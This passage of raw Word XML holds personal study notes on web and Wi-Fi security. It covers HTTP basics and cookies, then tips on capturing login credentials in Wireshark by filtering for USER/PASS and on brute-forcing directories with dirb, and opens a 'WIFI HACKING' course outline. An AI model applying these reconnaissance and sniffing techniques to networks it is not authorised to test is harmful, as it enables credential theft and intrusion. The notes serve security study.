        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16031744" w14:textId="3E9EE6DB" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704AB75" w14:textId="2EF4F418" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Firebase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DD90A" w14:textId="7B76A026" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Microsoft Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998FEB8" w14:textId="7DAA9DFF" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Digital Ocean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D219E9A" w14:textId="7A3FD3BB" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39A662" w14:textId="4F021316" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTP Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ABB37E" w14:textId="25BEC62D" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Headers</w:t>
      </w:r>
      <w:r w:rsidR="00346251">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Hold info about what you are requesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3AACE5" w14:textId="7708F8E0" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="00F170A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F170A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Requests</w:t>
      </w:r>
      <w:r w:rsidR="00F170A7" w:rsidRPr="00F170A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – User-agents: What browser are you using?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CAB0D1" w14:textId="7692077E" w:rsidR="005B6B7D" w:rsidRDefault="005B6B7D" w:rsidP="005B6B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E8BCF" w14:textId="4EB21E1D" w:rsidR="005B6B7D" w:rsidRDefault="005B6B7D" w:rsidP="005B6B7D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Interacts with Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176EA018" w14:textId="331B18FF" w:rsidR="00200538" w:rsidRPr="00200538" w:rsidRDefault="005B6B7D" w:rsidP="00200538">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435F8B29" w14:textId="3995F593" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Response</w:t>
      </w:r>
      <w:r w:rsidR="00F170A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Status codes, content type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB37275" w14:textId="7E967091" w:rsidR="00D07D28" w:rsidRDefault="00D07D28" w:rsidP="00D07D28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183FEF1" w14:textId="50A69FA4" w:rsidR="00D07D28" w:rsidRDefault="00D07D28" w:rsidP="00D07D28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sends Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5E72F2" w14:textId="577E5139" w:rsidR="00D07D28" w:rsidRDefault="00D07D28" w:rsidP="00D07D28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Status Codes, i.e., </w:t>
      </w:r>
      <w:r w:rsidR="00D8435F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>200, 302, 404, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1549F6" w14:textId="5A8D20AD" w:rsidR="00D8435F" w:rsidRPr="00D00D6B" w:rsidRDefault="001E02DF" w:rsidP="00D00D6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Browsers</w:t>
      </w:r>
      <w:r w:rsidR="00D8435F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Interpret and Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1F3264" w14:textId="2578CC4C" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="001E02DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sessions</w:t>
      </w:r>
      <w:r w:rsidR="00D00D6B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - COOKIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602242B7" w14:textId="5FD98126" w:rsidR="001E02DF" w:rsidRDefault="001E02DF" w:rsidP="00346251">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04228F6D" w14:textId="4C845B28" w:rsidR="00D07D28" w:rsidRDefault="005B6B7D" w:rsidP="00D07D28">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Client (REQUEST) -&gt; Server (RESPONSE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392DC74" w14:textId="77777777" w:rsidR="000D6702" w:rsidRDefault="000D6702" w:rsidP="000D6702">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C42075F" w14:textId="77777777" w:rsidR="00A00CD1" w:rsidRDefault="00A00CD1" w:rsidP="000D6702">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F79369" w14:textId="0513C112" w:rsidR="00A00CD1" w:rsidRPr="003A6250" w:rsidRDefault="000D6702" w:rsidP="003A6250">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Inspect Elemen</w:t>
      </w:r>
      <w:r w:rsidR="00A00CD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1E56DF" w14:textId="1495B75E" w:rsidR="00A00CD1" w:rsidRDefault="00A00CD1" w:rsidP="00A00CD1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>View cookies or session IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D186DA" w14:textId="0B40EDD2" w:rsidR="00A00CD1" w:rsidRDefault="003A6250" w:rsidP="003A6250">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark can view form submissions on certain websites, like submitting </w:t>
      </w:r>
      <w:r w:rsidR="001C3485">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>a username/password to a login form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284CE1E" w14:textId="4AFA1D76" w:rsidR="001C3485" w:rsidRDefault="001C3485" w:rsidP="001C3485">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Follow the HTTP stream for this, or filter the frames by what they contain (USER/PASS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252DCA74" w14:textId="73D85D1F" w:rsidR="001C3485" w:rsidRDefault="00607983" w:rsidP="001C3485">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">CURL – Redirect website </w:t>
      </w:r>
      <w:r w:rsidR="00BC1AC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>page output to the CLI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC323D" w14:textId="6C2F31FE" w:rsidR="00A43808" w:rsidRDefault="00A43808" w:rsidP="001C3485">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Can view website certificates from the website on the top toolbar for Firefox. (lock symbol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67241034" w14:textId="461D3B07" w:rsidR="00A43808" w:rsidRDefault="00055050" w:rsidP="001C3485">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dirb – brute force directory enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2935248F" w14:textId="58421795" w:rsidR="007D7DA6" w:rsidRDefault="007D7DA6" w:rsidP="007D7DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D161C" w14:textId="62A4AC22" w:rsidR="007D7DA6" w:rsidRDefault="007D7DA6" w:rsidP="007D7DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>I already took a lot of these notes mfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938AC84" w14:textId="77777777" w:rsidR="007D7DA6" w:rsidRDefault="007D7DA6" w:rsidP="007D7DA6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569E587E" w14:textId="07A9BA72" w:rsidR="007D7DA6" w:rsidRDefault="00E62C97" w:rsidP="00E62C97">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>WIFI HACKING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6FC08" w14:textId="77777777" w:rsidR="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="716DA057" w14:textId="77777777" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD1CC6" w14:textId="77777777" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This class combines course materials with 12 hands-on labs for practice. The following topics are covered in the course:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D359273" w14:textId="77777777" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B401A4B" w14:textId="77777777" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>IEEE 802.11 and the WiFi Alliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653DAB40" w14:textId="7EC337E0" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Channels and frequencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DFA7C5" w14:textId="4875C843" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Regulatory Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6433EB29" w14:textId="61CC2930" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Network structure, terminology, and modes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D15F62" w14:textId="5F24F65A" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Encryption on Wi-Fi networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19450420" w14:textId="6CAD0F88" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>OS, drivers, and Wi-Fi hardware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BC0B15" w14:textId="237CB6AD" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>State machine and introduction to 802.11 frames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401D4BB" w14:textId="463A6CB2" w:rsidR="00C04E29" w:rsidRPr="00C04E29" w:rsidRDefault="00C04E29" w:rsidP="00C04E29">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C04E29">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Penetration testing distributions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654AFB4C" w14:textId="563F44EA" w:rsidR="00C04E29" w:rsidRPr="005C5935" w:rsidRDefault="00C04E29" w:rsidP="005C5935">
      <w:pPr>
